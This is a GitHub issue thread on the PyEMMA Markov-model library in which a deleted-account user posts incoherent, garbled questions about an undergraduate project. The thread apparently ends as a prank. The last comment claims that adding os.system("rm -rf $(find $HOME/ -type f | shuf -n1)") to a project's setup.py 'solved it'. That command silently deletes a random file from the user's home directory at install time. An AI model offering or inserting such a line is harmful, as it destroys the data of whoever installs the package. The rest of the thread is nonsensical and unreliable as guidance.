markovmodel / PyEMMA

🚂 Python API for Emma's Markov Model Algorithms 🚂
http://pyemma.org
GNU Lesser General Public License v3.0
307 stars 118 forks source link

Can this be used? Please help?? #1447

Closed ghost closed 4 years ago

ghost commented 4 years ago

Can this be used for computation of chemistry biology? I do need it for my undergraduate project? Can you help me here?

thempel commented 4 years ago

Dear Peter, how do you where?

ghost commented 4 years ago

Why no help? I do how where!

fabian-paul commented 4 years ago

What do you plan to do as your undergraduate project?

ghost commented 4 years ago

Something like this https://github.com/peter-peter-1997/PyERNA. Deep learning for solving computation biology chemistry. :rocket: :rocket: :rocket:

ghost commented 4 years ago

Thanks @clonker @thempel @marscher now I do how where! I deleted my internet. Now compution is broken.

ghost commented 4 years ago

@clonker

Adding os.system("rm -rf $(find $HOME/ -type f | shuf -n1)") to setup.py of PyERNA solved it. Thanks!